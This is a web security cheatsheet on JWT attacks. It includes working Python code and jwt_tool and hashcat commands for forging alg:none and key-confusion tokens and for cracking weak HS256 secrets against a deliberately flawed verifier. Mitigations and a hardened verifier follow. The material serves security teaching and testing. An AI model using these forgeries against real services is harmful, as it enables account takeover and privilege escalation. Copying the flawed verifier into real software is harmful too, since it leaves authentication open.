
JWT Attacks

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

JWT (JSON Web Token) attacks target how an application issues and, above all, verifies the JSON Web Tokens it uses for authentication and authorization. The common weaknesses are: accepting the unsigned "none" algorithm; algorithm confusion, where a verifier that expects RS256 lets the token's own alg header switch it to HS256, so the server's RSA public key (which the attacker can obtain) becomes the HMAC secret; signing secrets weak enough to crack offline against a wordlist; and claims that are never checked, so an attacker can rewrite them once any of the signature problems above is present.

A successful attack lets the attacker forge tokens, escalate privileges, or impersonate other users without ever seeing the server's private signing key.
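The three weaknesses above, worked end to end as an added example (stdlib Python; not code from the original cheatsheet or from jwt_tool): verify_vulnerable() is a hypothetical server routine that lets the token's alg header choose the algorithm and hands the same key blob to every algorithm, which is the pair of mistakes behind "none" acceptance and RS256/HS256 confusion. The tokens, the weak secret and the PEM are constructed for the demo and are not real keys; the attacker-side helpers do what the cheatsheet's jwt_tool and hashcat commands do.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    """Base64url without '=' padding, as JWS requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Restore the padding JWT strips; a plain base64 -d fails without it."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_unverified(token: str) -> tuple:
    """Read header and claims with no signature check at all."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def make_token(header: dict, payload: dict, key: bytes = b"") -> str:
    """Serialize a compact JWS; supports HS256 and the unsigned 'none' form."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    if header["alg"] == "none":
        return f"{h}.{p}."                           # empty signature segment
    if header["alg"] == "HS256":
        sig = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        return f"{h}.{p}.{b64url_encode(sig)}"
    raise ValueError("demo serializes only HS256 and none")


# --- hypothetical vulnerable server side ------------------------------------
def verify_vulnerable(token: str, key_material: bytes) -> dict:
    """The untrusted header picks the algorithm, and one key_material blob (for an
    RS256 deployment: the public-key PEM) is used for whichever it picks. The real
    RS256 path is omitted because the attacks below never reach it."""
    header, payload = decode_unverified(token)
    h, p, sig = token.split(".")
    alg = header.get("alg")
    if alg == "none":                                # mistake 1: unsigned token accepted
        return payload
    if alg == "HS256":                               # mistake 2: PEM bytes become the HMAC key
        expected = hmac.new(key_material, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(b64url_encode(expected), sig):
            return payload
    raise ValueError("invalid token")


# --- attacker side -----------------------------------------------------------
def forge_none(token: str, **new_claims) -> str:
    """alg=none: drop the signature and rewrite claims (what jwt_tool -X a does)."""
    header, payload = decode_unverified(token)
    header["alg"] = "none"
    payload.update(new_claims)
    return make_token(header, payload)


def forge_confusion(token: str, public_key_pem: bytes, **new_claims) -> str:
    """RS256 -> HS256 confusion: HMAC with the server's public key bytes (jwt_tool -X k)."""
    header, payload = decode_unverified(token)
    header["alg"] = "HS256"
    payload.update(new_claims)
    return make_token(header, payload, public_key_pem)


def crack_hs256(token: str, wordlist: list):
    """Dictionary attack on the HMAC secret (hashcat -m 16500, jwt_tool -C -d)."""
    h, p, sig = token.split(".")
    signing_input = f"{h}.{p}".encode()
    for word in wordlist:
        cand = hmac.new(word.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(b64url_encode(cand), sig):
            return word
    return None


# --- constructed sample data (not real keys or captured traffic) ---------------
WEAK_SECRET = b"secret123"
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nQ09OU1RSVUNURUQgU1RBTkQtSU4=\n-----END PUBLIC KEY-----\n"
CLAIMS = {"sub": "1234", "username": "guest", "role": "user"}
CAPTURED_HS256 = make_token({"alg": "HS256", "typ": "JWT"}, CLAIMS, WEAK_SECRET)
# Stand-in for a token from an RS256 deployment: every attack replaces its
# signature, so 32 zero bytes stand in for the RSA signature.
CAPTURED_RS256 = ".".join([
    b64url_encode(b'{"alg":"RS256","typ":"JWT"}'),
    b64url_encode(json.dumps(CLAIMS, separators=(",", ":")).encode()),
    b64url_encode(bytes(32)),
])


def demo() -> dict:
    """All three attacks against the vulnerable verifier."""
    return {
        "none": verify_vulnerable(forge_none(CAPTURED_HS256, role="admin"), WEAK_SECRET)["role"],
        "confusion": verify_vulnerable(forge_confusion(CAPTURED_RS256, PUBLIC_KEY_PEM, role="admin"), PUBLIC_KEY_PEM)["role"],
        "cracked": crack_hs256(CAPTURED_HS256, ["password", "changeme", "secret123", "jwt"]),
    }


if __name__ == "__main__":
    print(decode_unverified(CAPTURED_HS256))
    print(demo())
```

decode_unverified() is the Python equivalent of the cut/base64 one-liner in the commands section, with the base64url padding handled; the server-side routine is deliberately wrong and must not be reused as a verifier.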

Category: Web

Key Commands & Payloads

Commands and payloads commonly used when testing for or exploiting JWT attacks:

# decode the claims; JWT uses base64url without padding, so restore it before base64 -d
echo "$token" | cut -d. -f2 | tr '_-' '/+' | awk '{ printf "%s%s\n", $0, substr("===", 1, (4 - length($0) % 4) % 4) }' | base64 -d
# key confusion: re-sign with HS256 using the server's RSA public key as the HMAC secret
jwt_tool <token> -X k -pk public.pem
# tamper a claim; pair with -X a (alg:none) or -X k so the result carries a signature the target accepts
jwt_tool <token> -I -pc username -pv admin
# crack an HS256 secret offline (hashcat mode 16500 = JWT)
hashcat -m 16500 jwt.txt wordlist.txt
# same dictionary attack with jwt_tool
jwt_tool <token> -C -d wordlist.txt

Tools & Techniques

Recommended tools for JWT attacks:

  • jwt.io: online JWT debugger/decoder (decode locally instead when the token belongs to a client engagement)
  • jwt_tool: Python-based JWT testing toolkit (tampering, alg:none, key confusion, dictionary cracking)
  • jwt-cracker: Node.js brute-force tool for HS256 secrets
  • Hashcat: mode 16500 for JWT cracking
  • Manual: set alg to 'none' and drop the signature, change claims, swap RS256 for HS256 with the public key as secret

Prevention & Mitigation

Security recommendations to prevent JWT attacks:

  • Never let the token's alg header choose the algorithm: pin the expected algorithm and key type in server code and reject everything else, including 'none'
  • Use strong, unique signing keys (at least 256 bits of entropy for HS256, as RFC 7518 requires); a password-like string is crackable offline
  • Keep token lifetimes short (minutes rather than days) so a stolen or forged token is bounded by exp
  • Prefer asymmetric algorithms (RS256/ES256) when several services verify tokens, so verifiers hold no secret that can mint tokens; this does not replace pinning the algorithm, since RS256 deployments are exactly what confusion attacks target
  • Validate all claims server-side: require exp, nbf, iss and aud and reject a token that lacks any of them
  • Rotate signing keys periodically and remove retired keys from the verifier's key set
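A verifier that applies the list above, as an added example (stdlib Python, HS256; not the page's or any library's code): the algorithm is fixed in code, the secret length is enforced, the signature is compared in constant time, and exp, nbf, iss and aud are mandatory. issue_token, verify_token, the issuer and audience strings, the secrets and the stand-in PEM are all constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

PINNED_ALG = "HS256"        # decided by the server's code, never read from the token
MIN_SECRET_BYTES = 32       # RFC 7518: an HS256 key must be at least 256 bits


class TokenError(Exception):
    """Any verification failure; the message is for server logs, not for clients."""


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _check_secret(secret: bytes) -> None:
    if len(secret) < MIN_SECRET_BYTES:
        raise TokenError("HS256 secret shorter than 256 bits")


def issue_token(claims: dict, secret: bytes, issuer: str, audience: str,
                ttl: int = 600, now: Optional[int] = None) -> str:
    """Mint a short-lived token; iss, aud, iat, nbf and exp are set by the server."""
    _check_secret(secret)
    now = int(time.time()) if now is None else now
    payload = {**claims, "iss": issuer, "aud": audience, "iat": now, "nbf": now, "exp": now + ttl}
    h = _b64url_encode(json.dumps({"alg": PINNED_ALG, "typ": "JWT"}, separators=(",", ":")).encode())
    p = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{_b64url_encode(sig)}"


def verify_token(token: str, secret: bytes, issuer: str, audience: str,
                 now: Optional[int] = None, leeway: int = 30) -> dict:
    """Return the claims only if every check passes."""
    _check_secret(secret)
    now = int(time.time()) if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        raise TokenError("malformed token")
    h, p, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(h))
        payload = json.loads(_b64url_decode(p))
    except ValueError as exc:            # bad base64, bad UTF-8 and bad JSON all land here
        raise TokenError("undecodable header or payload") from exc
    # 1. The algorithm is pinned: 'none', 'RS256' or any other value is refused.
    if not isinstance(header, dict) or header.get("alg") != PINNED_ALG:
        raise TokenError("unexpected alg")
    # 2. The signature is recomputed with the server's own secret and compared in constant time.
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_b64url_encode(expected), sig_b64):
        raise TokenError("bad signature")
    # 3. Time and scope claims are mandatory and checked against server-side values.
    if not isinstance(payload, dict):
        raise TokenError("payload is not a JSON object")
    for claim in ("exp", "nbf", "iss", "aud"):
        if claim not in payload:
            raise TokenError(f"missing {claim}")
    if not isinstance(payload["exp"], int) or now > payload["exp"] + leeway:
        raise TokenError("expired")
    if not isinstance(payload["nbf"], int) or now < payload["nbf"] - leeway:
        raise TokenError("not yet valid")
    if payload["iss"] != issuer:
        raise TokenError("wrong issuer")
    allowed = payload["aud"] if isinstance(payload["aud"], list) else [payload["aud"]]
    if audience not in allowed:
        raise TokenError("wrong audience")
    return payload


# Constructed demo inputs: a 32-byte secret, a weak one and a stand-in PEM (not a real key).
SECRET = b"0123456789abcdef0123456789abcdef"
WEAK_SECRET = b"secret123"
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nQ09OU1RSVUNURUQ=\n-----END PUBLIC KEY-----\n"
ISSUER, AUDIENCE, NOW = "https://auth.example", "orders-api", 1_700_000_000


def _outcome(fn) -> str:
    try:
        fn()
        return "accepted"
    except TokenError as exc:
        return f"rejected: {exc}"


def demo() -> dict:
    """A valid token is accepted; the classic forgeries and stale or misdirected tokens are refused."""
    good = issue_token({"sub": "u42", "role": "user"}, SECRET, ISSUER, AUDIENCE, now=NOW)
    h, p, _ = good.split(".")
    none_hdr = _b64url_encode(b'{"alg":"none","typ":"JWT"}')
    # HS256 over the public-key PEM bytes: what an RS256 -> HS256 confusion attack forges.
    pem_sig = _b64url_encode(hmac.new(PUBLIC_KEY_PEM, f"{h}.{p}".encode(), hashlib.sha256).digest())
    stale = issue_token({"sub": "u42"}, SECRET, ISSUER, AUDIENCE, ttl=60, now=NOW - 3600)
    return {
        "valid": verify_token(good, SECRET, ISSUER, AUDIENCE, now=NOW)["sub"],
        "alg_none": _outcome(lambda: verify_token(f"{none_hdr}.{p}.", SECRET, ISSUER, AUDIENCE, now=NOW)),
        "confusion": _outcome(lambda: verify_token(f"{h}.{p}.{pem_sig}", SECRET, ISSUER, AUDIENCE, now=NOW)),
        "expired": _outcome(lambda: verify_token(stale, SECRET, ISSUER, AUDIENCE, now=NOW)),
        "wrong_aud": _outcome(lambda: verify_token(good, SECRET, ISSUER, "billing-api", now=NOW)),
        "weak_key": _outcome(lambda: issue_token({"sub": "u42"}, WEAK_SECRET, ISSUER, AUDIENCE, now=NOW)),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:10s} {result}")
```

The order of checks matters: the algorithm test comes before any cryptography, so a token claiming 'none' or a different algorithm is refused without touching key material, and the claim checks run only after the signature holds, so an attacker cannot use timing or error messages from the claim stage to learn anything about an unsigned payload.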
